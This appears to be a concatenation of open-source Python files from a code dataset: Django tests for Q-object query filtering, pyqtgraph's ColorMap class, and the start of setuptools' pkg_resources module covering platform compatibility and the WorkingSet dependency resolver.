            Article.objects.filter(Q(pk=self.a1) & (~Q(pk=self.a2) | Q(pk=self.a3))), [
                'Hello'
            ],
            attrgetter("headline"),
        )

    def test_complex_filter(self):
        """``complex_filter`` accepts both a lookup dict and a Q object."""
        # The 'complex_filter' method supports framework features such as
        # 'limit_choices_to' which normally take a single dictionary of lookup
        # arguments but need to support arbitrary queries via Q objects too.
        self.assertQuerysetEqual(
            Article.objects.complex_filter({'pk': self.a1}), [
                'Hello'
            ],
            attrgetter("headline"),
        )
        self.assertQuerysetEqual(
            Article.objects.complex_filter(Q(pk=self.a1) | Q(pk=self.a2)), [
                'Hello',
                'Goodbye'
            ],
            attrgetter("headline"),
        )

    def test_empty_in(self):
        """``pk__in=[]`` matches nothing, but can still be OR-ed usefully."""
        # Passing "in" an empty list returns no results ...
        self.assertQuerysetEqual(
            Article.objects.filter(pk__in=[]),
            []
        )
        # ... but can return results if we OR it with another query.
        self.assertQuerysetEqual(
            Article.objects.filter(Q(pk__in=[]) | Q(headline__icontains='goodbye')), [
                'Goodbye',
                'Hello and goodbye'
            ],
            attrgetter("headline"),
        )

    def test_q_and(self):
        """Multiple Q arguments (and Q mixed with kwargs) are ANDed."""
        # Q arg objects are ANDed
        self.assertQuerysetEqual(
            Article.objects.filter(Q(headline__startswith='Hello'), Q(headline__contains='bye')), [
                'Hello and goodbye'
            ],
            attrgetter("headline")
        )
        # Q arg AND order is irrelevant
        self.assertQuerysetEqual(
            Article.objects.filter(Q(headline__contains='bye'), headline__startswith='Hello'), [
                'Hello and goodbye'
            ],
            attrgetter("headline"),
        )
        self.assertQuerysetEqual(
            Article.objects.filter(Q(headline__startswith='Hello') & Q(headline__startswith='Goodbye')),
            []
        )

    def test_q_exclude(self):
        """``exclude()`` also accepts Q objects."""
        self.assertQuerysetEqual(
            Article.objects.exclude(Q(headline__startswith='Hello')), [
                'Goodbye'
            ],
            attrgetter("headline")
        )

    def test_other_arg_queries(self):
        """Q objects work with get(), count(), values() and in_bulk() too."""
        # Try some arg queries with operations other than filter.
        self.assertEqual(
            Article.objects.get(Q(headline__startswith='Hello'), Q(headline__contains='bye')).headline,
            'Hello and goodbye'
        )
        self.assertEqual(
            Article.objects.filter(Q(headline__startswith='Hello') | Q(headline__contains='bye')).count(),
            3
        )
        self.assertSequenceEqual(
            Article.objects.filter(Q(headline__startswith='Hello'), Q(headline__contains='bye')).values(), [
                {"headline": "Hello and goodbye", "id": self.a3, "pub_date": datetime(2005, 11, 29)},
            ],
        )
        self.assertEqual(
            Article.objects.filter(Q(headline__startswith='Hello')).in_bulk([self.a1, self.a2]),
            {self.a1: Article.objects.get(pk=self.a1)}
        )
| bsd-3-clause |
acq4/acq4 | acq4/pyqtgraph/colormap.py | 3 | 9846 | import numpy as np
from .Qt import QtGui, QtCore
from .python2_3 import basestring
class ColorMap(object):
    """
    A ColorMap defines a relationship between a scalar value and a range of colors.
    ColorMaps are commonly used for false-coloring monochromatic images, coloring
    scatter-plot points, and coloring surface plots by height.

    Each color map is defined by a set of colors, each corresponding to a
    particular scalar value. For example:

        | 0.0  -> black
        | 0.2  -> red
        | 0.6  -> yellow
        | 1.0  -> white

    The colors for intermediate values are determined by interpolating between
    the two nearest colors in either RGB or HSV color space.

    To provide user-defined color mappings, see :class:`GradientWidget <pyqtgraph.GradientWidget>`.
    """

    ## color interpolation modes
    RGB = 1
    HSV_POS = 2
    HSV_NEG = 3

    ## boundary modes
    CLIP = 1
    REPEAT = 2
    MIRROR = 3

    ## return types
    BYTE = 1
    FLOAT = 2
    QCOLOR = 3

    # String aliases accepted wherever a mode constant is expected.
    enumMap = {
        'rgb': RGB,
        'hsv+': HSV_POS,
        'hsv-': HSV_NEG,
        'clip': CLIP,
        'repeat': REPEAT,
        'mirror': MIRROR,
        'byte': BYTE,
        'float': FLOAT,
        'qcolor': QCOLOR,
    }

    def __init__(self, pos, color, mode=None):
        """
        =============== ==============================================================
        **Arguments:**
        pos             Array of positions where each color is defined
        color           Array of RGBA colors.
                        Integer data types are interpreted as 0-255; float data types
                        are interpreted as 0.0-1.0
        mode            Array of color modes (ColorMap.RGB, HSV_POS, or HSV_NEG)
                        indicating the color space that should be used when
                        interpolating between stops. Note that the last mode value is
                        ignored. By default, the mode is entirely RGB.
        =============== ==============================================================
        """
        # Stops are stored sorted by position; colors are reordered to match.
        self.pos = np.array(pos)
        order = np.argsort(self.pos)
        self.pos = self.pos[order]
        self.color = np.array(color)[order]
        if mode is None:
            mode = np.ones(len(pos))
        # NOTE(review): `mode` is *not* reordered by `order`, so unsorted
        # `pos` combined with per-stop modes yields mismatched modes.
        # Harmless today because HSV interpolation is not implemented.
        self.mode = mode
        # Cache of (pos, color) stop arrays keyed by return-type mode.
        self.stopsCache = {}

    def map(self, data, mode='byte'):
        """
        Return an array of colors corresponding to the values in *data*.
        Data must be either a scalar position or an array (any shape) of positions.

        The *mode* argument determines the type of data returned:

        =========== ===============================================================
        byte        (default) Values are returned as 0-255 unsigned bytes.
        float       Values are returned as 0.0-1.0 floats.
        qcolor      Values are returned as an array of QColor objects.
        =========== ===============================================================
        """
        if isinstance(mode, basestring):
            mode = self.enumMap[mode.lower()]

        if mode == self.QCOLOR:
            # QColor construction wants integer channels; interpolate as bytes.
            pos, color = self.getStops(self.BYTE)
        else:
            pos, color = self.getStops(mode)

        # don't need to clip data -- np.interp takes care of it.
        if np.isscalar(data):
            interp = np.empty((color.shape[1],), dtype=color.dtype)
        else:
            if not isinstance(data, np.ndarray):
                data = np.array(data)
            interp = np.empty(data.shape + (color.shape[1],), dtype=color.dtype)
        # Interpolate each color channel independently.
        for i in range(color.shape[1]):
            interp[...,i] = np.interp(data, pos, color[:,i])

        # Convert to QColor if requested
        if mode == self.QCOLOR:
            if np.isscalar(data):
                return QtGui.QColor(*interp)
            else:
                return [QtGui.QColor(*x) for x in interp]
        else:
            return interp

    def mapToQColor(self, data):
        """Convenience function; see :func:`map() <pyqtgraph.ColorMap.map>`."""
        return self.map(data, mode=self.QCOLOR)

    def mapToByte(self, data):
        """Convenience function; see :func:`map() <pyqtgraph.ColorMap.map>`."""
        return self.map(data, mode=self.BYTE)

    def mapToFloat(self, data):
        """Convenience function; see :func:`map() <pyqtgraph.ColorMap.map>`."""
        return self.map(data, mode=self.FLOAT)

    def getGradient(self, p1=None, p2=None):
        """Return a QLinearGradient object spanning from QPoints p1 to p2."""
        if p1 is None:
            p1 = QtCore.QPointF(0,0)
        if p2 is None:
            p2 = QtCore.QPointF(self.pos.max()-self.pos.min(),0)
        g = QtGui.QLinearGradient(p1, p2)

        pos, color = self.getStops(mode=self.BYTE)
        color = [QtGui.QColor(*x) for x in color]
        g.setStops(list(zip(pos, color)))
        return g

    def getColors(self, mode=None):
        """Return list of all color stops converted to the specified mode.
        If mode is None, then no conversion is done."""
        if isinstance(mode, basestring):
            mode = self.enumMap[mode.lower()]

        color = self.color
        if mode in [self.BYTE, self.QCOLOR] and color.dtype.kind == 'f':
            color = (color * 255).astype(np.ubyte)
        elif mode == self.FLOAT and color.dtype.kind != 'f':
            color = color.astype(float) / 255.

        if mode == self.QCOLOR:
            color = [QtGui.QColor(*x) for x in color]
        return color

    def getStops(self, mode):
        ## Get fully-expanded set of RGBA stops in either float or byte mode.
        # Results are cached per mode; the cache is never invalidated, so
        # self.color must not be mutated after the first call.
        if mode not in self.stopsCache:
            color = self.color
            if mode == self.BYTE and color.dtype.kind == 'f':
                color = (color * 255).astype(np.ubyte)
            elif mode == self.FLOAT and color.dtype.kind != 'f':
                color = color.astype(float) / 255.
            ## to support HSV mode, stops between each pair would need to be
            ## expanded here.
            self.stopsCache[mode] = (self.pos, color)
        return self.stopsCache[mode]

    def getLookupTable(self, start=0.0, stop=1.0, nPts=512, alpha=None, mode='byte'):
        """
        Return an RGB(A) lookup table (ndarray).

        =============== =============================================================================
        **Arguments:**
        start           The starting value in the lookup table (default=0.0)
        stop            The final value in the lookup table (default=1.0)
        nPts            The number of points in the returned lookup table.
        alpha           True, False, or None - Specifies whether or not alpha values are included
                        in the table. If alpha is None, it will be automatically determined.
        mode            Determines return type: 'byte' (0-255), 'float' (0.0-1.0), or 'qcolor'.
                        See :func:`map() <pyqtgraph.ColorMap.map>`.
        =============== =============================================================================
        """
        if isinstance(mode, basestring):
            mode = self.enumMap[mode.lower()]

        if alpha is None:
            alpha = self.usesAlpha()

        x = np.linspace(start, stop, nPts)
        table = self.map(x, mode)

        if not alpha:
            # Drop the alpha channel when it carries no information.
            return table[:,:3]
        else:
            return table

    def usesAlpha(self):
        """Return True if any stops have an alpha < 255"""
        max = 1.0 if self.color.dtype.kind == 'f' else 255
        return np.any(self.color[:,3] != max)

    def isMapTrivial(self):
        """
        Return True if the gradient has exactly two stops in it: black at 0.0 and white at 1.0.
        """
        if len(self.pos) != 2:
            return False
        if self.pos[0] != 0.0 or self.pos[1] != 1.0:
            return False
        if self.color.dtype.kind == 'f':
            return np.all(self.color == np.array([[0.,0.,0.,1.], [1.,1.,1.,1.]]))
        else:
            return np.all(self.color == np.array([[0,0,0,255], [255,255,255,255]]))

    def __repr__(self):
        pos = repr(self.pos).replace('\n', '')
        color = repr(self.color).replace('\n', '')
        return "ColorMap(%s, %s)" % (pos, color)
| mit |
alexus37/AugmentedRealityChess | pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/pkg_resources.py | 134 | 99605 | """
Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
import sys
import os
import time
import re
import imp
import zipfile
import zipimport
import warnings
import stat
import functools
import pkgutil
import token
import symbol
import operator
import platform
from pkgutil import get_importer
try:
from urlparse import urlparse, urlunparse
except ImportError:
from urllib.parse import urlparse, urlunparse
try:
frozenset
except NameError:
from sets import ImmutableSet as frozenset
try:
basestring
next = lambda o: o.next()
from cStringIO import StringIO as BytesIO
except NameError:
basestring = str
from io import BytesIO
def execfile(fn, globs=None, locs=None):
if globs is None:
globs = globals()
if locs is None:
locs = globs
exec(compile(open(fn).read(), fn, 'exec'), globs, locs)
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
# Avoid try/except due to potential problems with delayed import mechanisms.
if sys.version_info >= (3, 3) and sys.implementation.name == "cpython":
import importlib._bootstrap as importlib_bootstrap
else:
importlib_bootstrap = None
try:
import parser
except ImportError:
pass
def _bypass_ensure_directory(name, mode=0x1FF): # 0777
    # Sandbox-bypassing version of ensure_directory()
    # Recursively creates the *parent* directories of `name` using the raw
    # os.mkdir captured at import time, so the sandbox hooks are not invoked.
    if not WRITE_SUPPORT:
        raise IOError('"os.mkdir" not supported on this platform.')
    dirname, filename = split(name)
    if dirname and filename and not isdir(dirname):
        # Ensure the grandparent exists first, then create the parent.
        _bypass_ensure_directory(dirname)
        mkdir(dirname, mode)
# Registry of module-level state variables: name -> type tag ('dict',
# 'object', 'none'). Used by __getstate__/__setstate__ to snapshot and
# restore global state (e.g. around sandboxed execution).
_state_vars = {}

def _declare_state(vartype, **kw):
    # Install each keyword as a module global and record its type tag so
    # the snapshot helpers know how to copy/restore it.
    g = globals()
    for name, val in kw.items():
        g[name] = val
        _state_vars[name] = vartype

def __getstate__():
    # Snapshot every registered state variable via its _sget_<type> helper.
    state = {}
    g = globals()
    for k, v in _state_vars.items():
        state[k] = g['_sget_'+v](g[k])
    return state

def __setstate__(state):
    # Restore a snapshot produced by __getstate__ via the _sset_<type>
    # helpers (restores in place rather than rebinding the globals).
    g = globals()
    for k, v in state.items():
        g['_sset_'+_state_vars[k]](k, g[k], v)
    return state

def _sget_dict(val):
    # Snapshot a dict by shallow copy.
    return val.copy()

def _sset_dict(key, ob, state):
    # Restore a dict in place so existing references stay valid.
    ob.clear()
    ob.update(state)

def _sget_object(val):
    # Objects provide their own __getstate__/__setstate__ protocol.
    return val.__getstate__()

def _sset_object(key, ob, state):
    ob.__setstate__(state)

# 'none'-typed variables are neither saved nor restored.
_sget_none = _sset_none = lambda *args: None
def get_supported_platform():
    """Return this platform's maximum compatible version.

    distutils.util.get_platform() normally reports the minimum version
    of Mac OS X that would be required to *use* extensions produced by
    distutils.  But what we want when checking compatibility is to know the
    version of Mac OS X that we are *running*.  To allow usage of packages that
    explicitly require a newer version of Mac OS X, we must also know the
    current version of the OS.

    If this condition occurs for any other platform with a version in its
    platform strings, this function should be extended accordingly.
    """
    plat = get_build_platform()
    m = macosVersionString.match(plat)
    if m is not None and sys.platform == "darwin":
        try:
            # Replace the build-time OS X version with the running version,
            # keeping the architecture suffix from the build platform string.
            plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
        except ValueError:
            pass    # not Mac OS X
    return plat
# Public API of this module, grouped by purpose.
__all__ = [
    # Basic resource access and distribution/entry point discovery
    'require', 'run_script', 'get_provider',  'get_distribution',
    'load_entry_point', 'get_entry_map', 'get_entry_info', 'iter_entry_points',
    'resource_string', 'resource_stream', 'resource_filename',
    'resource_listdir', 'resource_exists', 'resource_isdir',

    # Environmental control
    'declare_namespace', 'working_set', 'add_activation_listener',
    'find_distributions', 'set_extraction_path', 'cleanup_resources',
    'get_default_cache',

    # Primary implementation classes
    'Environment', 'WorkingSet', 'ResourceManager',
    'Distribution', 'Requirement', 'EntryPoint',

    # Exceptions
    'ResolutionError','VersionConflict','DistributionNotFound','UnknownExtra',
    'ExtractionError',

    # Parsing functions and string utilities
    'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
    'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
    'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker',

    # filesystem utilities
    'ensure_directory', 'normalize_path',

    # Distribution "precedence" constants
    'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',

    # "Provider" interfaces, implementations, and registration/lookup APIs
    'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
    'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
    'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
    'register_finder', 'register_namespace_handler', 'register_loader_type',
    'fixup_namespace_packages', 'get_importer',

    # Deprecated/backward compatibility only
    'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
"""Abstract base for dependency resolution errors"""
def __repr__(self):
return self.__class__.__name__+repr(self.args)
# Raised e.g. by WorkingSet.find()/resolve() when the active distribution
# for a project does not satisfy the requested requirement.
class VersionConflict(ResolutionError):
    """An already-installed version conflicts with the requested version"""
# Raised e.g. by WorkingSet.resolve() when no installed or obtainable
# distribution satisfies a requirement.
class DistributionNotFound(ResolutionError):
    """A requested distribution was not found"""
# Raised when a requirement names an "extra" (optional feature) that the
# matched distribution does not declare.
class UnknownExtra(ResolutionError):
    """Distribution doesn't have an "extra feature" of the given name"""
# Registry of loader type -> provider factory; populated via
# register_loader_type() and consumed by get_provider().
_provider_factories = {}
# First three characters of sys.version, e.g. '2.7' -- used to match
# distributions against the running interpreter's major.minor version.
PY_MAJOR = sys.version[:3]
# Distribution "precedence" codes: when several distributions satisfy the
# same requirement, a higher value is preferred.
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
    """Register `provider_factory` to make providers for `loader_type`
    `loader_type` is the type or class of a PEP 302 ``module.__loader__``,
    and `provider_factory` is a function that, passed a *module* object,
    returns an ``IResourceProvider`` for that module.
    """
    # The registry is consulted by get_provider() via _find_adapter().
    _provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
    """Return an IResourceProvider for the named module or requirement"""
    # A Requirement is satisfied from the global working set (activating a
    # matching distribution on demand if necessary).
    if isinstance(moduleOrReq, Requirement):
        return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
    # Otherwise treat the argument as a module name, importing it lazily.
    if moduleOrReq not in sys.modules:
        __import__(moduleOrReq)
    module = sys.modules[moduleOrReq]
    loader = getattr(module, '__loader__', None)
    # Adapt the module's PEP 302 loader to a resource provider.
    return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
    """Return the Mac OS X version as a list of string components.
    NOTE: the mutable default argument is intentional -- it memoizes the
    result for the lifetime of the process.
    """
    if not _cache:
        import platform
        version = platform.mac_ver()[0]
        # fallback for MacPorts
        if version == '':
            import plistlib
            plist = '/System/Library/CoreServices/SystemVersion.plist'
            if os.path.exists(plist):
                if hasattr(plistlib, 'readPlist'):
                    plist_content = plistlib.readPlist(plist)
                    if 'ProductVersion' in plist_content:
                        version = plist_content['ProductVersion']
        _cache.append(version.split('.'))
    return _cache[0]
def _macosx_arch(machine):
return {'PowerPC':'ppc', 'Power_Macintosh':'ppc'}.get(machine,machine)
def get_build_platform():
    """Return this platform's string for platform-specific distributions
    XXX Currently this is the same as ``distutils.util.get_platform()``, but it
    needs some hacks for Linux and Mac OS X.
    """
    try:
        # Python 2.7 or >=3.2
        from sysconfig import get_platform
    except ImportError:
        from distutils.util import get_platform
    plat = get_platform()
    # On OS X, older Pythons may not report a 'macosx-' platform; rebuild
    # the string from the live OS version and machine type instead.
    if sys.platform == "darwin" and not plat.startswith('macosx-'):
        try:
            version = _macosx_vers()
            machine = os.uname()[4].replace(" ", "_")
            return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
                _macosx_arch(machine))
        except ValueError:
            # if someone is running a non-Mac darwin system, this will fall
            # through to the default implementation
            pass
    return plat
# Patterns for parsing the platform component of platform-specific
# distributions: modern 'macosx-<major>.<minor>-<arch>' and the legacy
# pre-setuptools-0.6 'darwin-<x>.<y>.<z>-<arch>' designation.
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
get_platform = get_build_platform # XXX backward compat
def compatible_platforms(provided,required):
    """Can code for the `provided` platform run on the `required` platform?
    Returns true if either platform is ``None``, or the platforms are equal.
    XXX Needs compatibility checks for Linux and other unixy OSes.
    """
    if provided is None or required is None or provided==required:
        return True # easy case
    # Mac OS X special cases
    reqMac = macosVersionString.match(required)
    if reqMac:
        provMac = macosVersionString.match(provided)
        # is this a Mac package?
        if not provMac:
            # this is backwards compatibility for packages built before
            # setuptools 0.6. All packages built after this point will
            # use the new macosx designation.
            provDarwin = darwinVersionString.match(provided)
            if provDarwin:
                dversion = int(provDarwin.group(1))
                macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
                # NOTE(review): lexicographic string comparison -- adequate
                # only for the legacy 10.3/10.4 range handled here.
                if dversion == 7 and macosversion >= "10.3" or \
                    dversion == 8 and macosversion >= "10.4":
                    #import warnings
                    #warnings.warn("Mac eggs should be rebuilt to "
                    # "use the macosx designation instead of darwin.",
                    # category=DeprecationWarning)
                    return True
            return False # egg isn't macosx or legacy darwin
        # are they the same major version and machine type?
        if provMac.group(1) != reqMac.group(1) or \
            provMac.group(3) != reqMac.group(3):
            return False
        # is the required OS major update >= the provided one?
        if int(provMac.group(2)) > int(reqMac.group(2)):
            return False
        return True
    # XXX Linux and other platforms' special cases should go here
    return False
def run_script(dist_spec, script_name):
    """Locate distribution `dist_spec` and run its `script_name` script"""
    # Run the script in the *caller's* global namespace: clear it, keep only
    # __name__, so the script executes as if it were the caller's module.
    ns = sys._getframe(1).f_globals
    name = ns['__name__']
    ns.clear()
    ns['__name__'] = name
    require(dist_spec)[0].run_script(script_name, ns)
run_main = run_script # backward compatibility
def get_distribution(dist):
    """Return a current distribution object for a Requirement or string"""
    # Successively coerce: string -> Requirement -> Distribution.
    resolved = dist
    if isinstance(resolved, basestring):
        resolved = Requirement.parse(resolved)
    if isinstance(resolved, Requirement):
        resolved = get_provider(resolved)
    if not isinstance(resolved, Distribution):
        raise TypeError("Expected string, Requirement, or Distribution", resolved)
    return resolved
# Convenience wrappers: each accepts a string, Requirement, or Distribution
# (coerced via get_distribution) and delegates to the Distribution method.
def load_entry_point(dist, group, name):
    """Return `name` entry point of `group` for `dist` or raise ImportError"""
    return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
    """Return the entry point map for `group`, or the full entry map"""
    return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
    """Return the EntryPoint object for `group`+`name`, or ``None``"""
    return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
    """Interface specification for objects that supply distribution metadata.
    NOTE: these are documentation-only stubs -- the methods intentionally
    omit ``self`` and have no bodies; concrete providers implement them.
    """
    def has_metadata(name):
        """Does the package's distribution contain the named metadata?"""
    def get_metadata(name):
        """The named metadata resource as a string"""
    def get_metadata_lines(name):
        """Yield named metadata resource as list of non-blank non-comment lines
        Leading and trailing whitespace is stripped from each line, and lines
        with ``#`` as the first non-blank character are omitted."""
    def metadata_isdir(name):
        """Is the named metadata a directory? (like ``os.path.isdir()``)"""
    def metadata_listdir(name):
        """List of metadata names in the directory (like ``os.listdir()``)"""
    def run_script(script_name, namespace):
        """Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
    """An object that provides access to package resources"""
    # NOTE: like IMetadataProvider, these are documentation-only stubs; the
    # methods intentionally omit ``self``.
    def get_resource_filename(manager, resource_name):
        """Return a true filesystem path for `resource_name`
        `manager` must be an ``IResourceManager``"""
    def get_resource_stream(manager, resource_name):
        """Return a readable file-like object for `resource_name`
        `manager` must be an ``IResourceManager``"""
    def get_resource_string(manager, resource_name):
        """Return a string containing the contents of `resource_name`
        `manager` must be an ``IResourceManager``"""
    def has_resource(resource_name):
        """Does the package contain the named resource?"""
    def resource_isdir(resource_name):
        """Is the named resource a directory? (like ``os.path.isdir()``)"""
    def resource_listdir(resource_name):
        """List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
    """A collection of active distributions on sys.path (or a similar list)"""
    def __init__(self, entries=None):
        """Create working set from list of path entries (default=sys.path)"""
        self.entries = []
        # Map of path entry -> list of distribution keys found on that entry.
        self.entry_keys = {}
        # Map of distribution key -> the active Distribution for that project.
        self.by_key = {}
        # Callables notified (via subscribe()) whenever a dist is added.
        self.callbacks = []
        if entries is None:
            entries = sys.path
        for entry in entries:
            self.add_entry(entry)
    def add_entry(self, entry):
        """Add a path item to ``.entries``, finding any distributions on it
        ``find_distributions(entry, True)`` is used to find distributions
        corresponding to the path entry, and they are added. `entry` is
        always appended to ``.entries``, even if it is already present.
        (This is because ``sys.path`` can contain the same value more than
        once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
        equal ``sys.path``.)
        """
        self.entry_keys.setdefault(entry, [])
        self.entries.append(entry)
        for dist in find_distributions(entry, True):
            self.add(dist, entry, False)
    def __contains__(self,dist):
        """True if `dist` is the active distribution for its project"""
        return self.by_key.get(dist.key) == dist
    def find(self, req):
        """Find a distribution matching requirement `req`
        If there is an active distribution for the requested project, this
        returns it as long as it meets the version requirement specified by
        `req`. But, if there is an active distribution for the project and it
        does *not* meet the `req` requirement, ``VersionConflict`` is raised.
        If there is no active distribution for the requested project, ``None``
        is returned.
        """
        dist = self.by_key.get(req.key)
        if dist is not None and dist not in req:
            raise VersionConflict(dist,req) # XXX add more info
        else:
            return dist
    def iter_entry_points(self, group, name=None):
        """Yield entry point objects from `group` matching `name`
        If `name` is None, yields all entry points in `group` from all
        distributions in the working set, otherwise only ones matching
        both `group` and `name` are yielded (in distribution order).
        """
        for dist in self:
            entries = dist.get_entry_map(group)
            if name is None:
                for ep in entries.values():
                    yield ep
            elif name in entries:
                yield entries[name]
    def run_script(self, requires, script_name):
        """Locate distribution for `requires` and run `script_name` script"""
        # Execute in the caller's (cleared) global namespace; see the
        # module-level run_script() for the same technique.
        ns = sys._getframe(1).f_globals
        name = ns['__name__']
        ns.clear()
        ns['__name__'] = name
        self.require(requires)[0].run_script(script_name, ns)
    def __iter__(self):
        """Yield distributions for non-duplicate projects in the working set
        The yield order is the order in which the items' path entries were
        added to the working set.
        """
        seen = {}
        for item in self.entries:
            if item not in self.entry_keys:
                # workaround a cache issue
                continue
            for key in self.entry_keys[item]:
                if key not in seen:
                    seen[key]=1
                    yield self.by_key[key]
    def add(self, dist, entry=None, insert=True, replace=False):
        """Add `dist` to working set, associated with `entry`
        If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
        On exit from this routine, `entry` is added to the end of the working
        set's ``.entries`` (if it wasn't already present).
        `dist` is only added to the working set if it's for a project that
        doesn't already have a distribution in the set, unless `replace=True`.
        If it's added, any callbacks registered with the ``subscribe()`` method
        will be called.
        """
        if insert:
            dist.insert_on(self.entries, entry)
        if entry is None:
            entry = dist.location
        # Record the dist's key under both the supplied entry and its own
        # location, so either path maps back to it.
        keys = self.entry_keys.setdefault(entry,[])
        keys2 = self.entry_keys.setdefault(dist.location,[])
        if not replace and dist.key in self.by_key:
            return # ignore hidden distros
        self.by_key[dist.key] = dist
        if dist.key not in keys:
            keys.append(dist.key)
        if dist.key not in keys2:
            keys2.append(dist.key)
        self._added_new(dist)
    def resolve(self, requirements, env=None, installer=None,
            replace_conflicting=False):
        """List all distributions needed to (recursively) meet `requirements`
        `requirements` must be a sequence of ``Requirement`` objects. `env`,
        if supplied, should be an ``Environment`` instance. If
        not supplied, it defaults to all distributions available within any
        entry or distribution in the working set. `installer`, if supplied,
        will be invoked with each requirement that cannot be met by an
        already-installed distribution; it should return a ``Distribution`` or
        ``None``.
        Unless `replace_conflicting=True`, raises a VersionConflict exception if
        any requirements are found on the path that have the correct name but
        the wrong version. Otherwise, if an `installer` is supplied it will be
        invoked to obtain the correct version of the requirement and activate
        it.
        """
        requirements = list(requirements)[::-1] # set up the stack
        processed = {} # set of processed requirements
        best = {} # key -> dist
        to_activate = []
        while requirements:
            req = requirements.pop(0) # process dependencies breadth-first
            if req in processed:
                # Ignore cyclic or redundant dependencies
                continue
            dist = best.get(req.key)
            if dist is None:
                # Find the best distribution and add it to the map
                dist = self.by_key.get(req.key)
                if dist is None or (dist not in req and replace_conflicting):
                    ws = self
                    if env is None:
                        if dist is None:
                            env = Environment(self.entries)
                        else:
                            # Use an empty environment and workingset to avoid
                            # any further conflicts with the conflicting
                            # distribution
                            env = Environment([])
                            ws = WorkingSet([])
                    dist = best[req.key] = env.best_match(req, ws, installer)
                    if dist is None:
                        #msg = ("The '%s' distribution was not found on this "
                        # "system, and is required by this application.")
                        #raise DistributionNotFound(msg % req)
                        # unfortunately, zc.buildout uses a str(err)
                        # to get the name of the distribution here..
                        raise DistributionNotFound(req)
                to_activate.append(dist)
            if dist not in req:
                # Oops, the "best" so far conflicts with a dependency
                raise VersionConflict(dist,req) # XXX put more info here
            # Queue this dist's own dependencies (plus any extras requested).
            requirements.extend(dist.requires(req.extras)[::-1])
            processed[req] = True
        return to_activate # return list of distros to activate
    def find_plugins(self, plugin_env, full_env=None, installer=None,
            fallback=True):
        """Find all activatable distributions in `plugin_env`
        Example usage::
            distributions, errors = working_set.find_plugins(
                Environment(plugin_dirlist)
            )
            map(working_set.add, distributions) # add plugins+libs to sys.path
            print 'Could not load', errors # display errors
        The `plugin_env` should be an ``Environment`` instance that contains
        only distributions that are in the project's "plugin directory" or
        directories. The `full_env`, if supplied, should be an ``Environment``
        contains all currently-available distributions. If `full_env` is not
        supplied, one is created automatically from the ``WorkingSet`` this
        method is called on, which will typically mean that every directory on
        ``sys.path`` will be scanned for distributions.
        `installer` is a standard installer callback as used by the
        ``resolve()`` method. The `fallback` flag indicates whether we should
        attempt to resolve older versions of a plugin if the newest version
        cannot be resolved.
        This method returns a 2-tuple: (`distributions`, `error_info`), where
        `distributions` is a list of the distributions found in `plugin_env`
        that were loadable, along with any other distributions that are needed
        to resolve their dependencies. `error_info` is a dictionary mapping
        unloadable plugin distributions to an exception instance describing the
        error that occurred. Usually this will be a ``DistributionNotFound`` or
        ``VersionConflict`` instance.
        """
        plugin_projects = list(plugin_env)
        plugin_projects.sort() # scan project names in alphabetic order
        error_info = {}
        distributions = {}
        if full_env is None:
            env = Environment(self.entries)
            env += plugin_env
        else:
            env = full_env + plugin_env
        # Resolve against a scratch copy so failures don't mutate this set.
        shadow_set = self.__class__([])
        list(map(shadow_set.add, self)) # put all our entries in shadow_set
        for project_name in plugin_projects:
            for dist in plugin_env[project_name]:
                req = [dist.as_requirement()]
                try:
                    resolvees = shadow_set.resolve(req, env, installer)
                except ResolutionError:
                    v = sys.exc_info()[1]
                    error_info[dist] = v # save error info
                    if fallback:
                        continue # try the next older version of project
                    else:
                        break # give up on this project, keep going
                else:
                    list(map(shadow_set.add, resolvees))
                    distributions.update(dict.fromkeys(resolvees))
                    # success, no need to try any more versions of this project
                    break
        distributions = list(distributions)
        distributions.sort()
        return distributions, error_info
    def require(self, *requirements):
        """Ensure that distributions matching `requirements` are activated
        `requirements` must be a string or a (possibly-nested) sequence
        thereof, specifying the distributions and versions required. The
        return value is a sequence of the distributions that needed to be
        activated to fulfill the requirements; all relevant distributions are
        included, even if they were already activated in this working set.
        """
        needed = self.resolve(parse_requirements(requirements))
        for dist in needed:
            self.add(dist)
        return needed
    def subscribe(self, callback):
        """Invoke `callback` for all distributions (including existing ones)"""
        if callback in self.callbacks:
            return
        self.callbacks.append(callback)
        for dist in self:
            callback(dist)
    def _added_new(self, dist):
        """Notify all subscribed callbacks that `dist` was added."""
        for callback in self.callbacks:
            callback(dist)
